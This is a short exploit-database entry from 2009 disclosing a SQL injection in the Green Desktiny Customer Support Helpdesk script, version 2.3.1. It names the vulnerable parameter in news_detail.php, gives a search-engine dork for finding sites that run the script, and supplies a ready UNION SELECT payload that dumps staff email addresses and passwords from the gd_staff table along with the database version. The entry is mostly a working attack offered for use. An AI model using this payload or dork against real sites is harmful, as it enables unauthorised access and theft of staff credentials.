id: 10409
date: 12/26/2009
title: Green Desktiny - Customer Support Helpdesk SQL injection vulnerability
author: kaMtiEz
cves: 

======================================================================
Green Desktiny - Customer Support Helpdesk SQL injection vulnerability
======================================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.greendesktiny.com/
[+] Download : -
[+] version : 2.3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : $68           
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/news_detail.php?id=[INDONESIANCODER]
 
[ Exploit ]
 
-666/**/union/**/select/**/666,666,666,666,666,666,666,666,666,concat_ws(0x3a,email,password),@@version,666/**/from/**/gd_staff--
 
 
===========================================================================



#  0day.today [2023-03-25]  #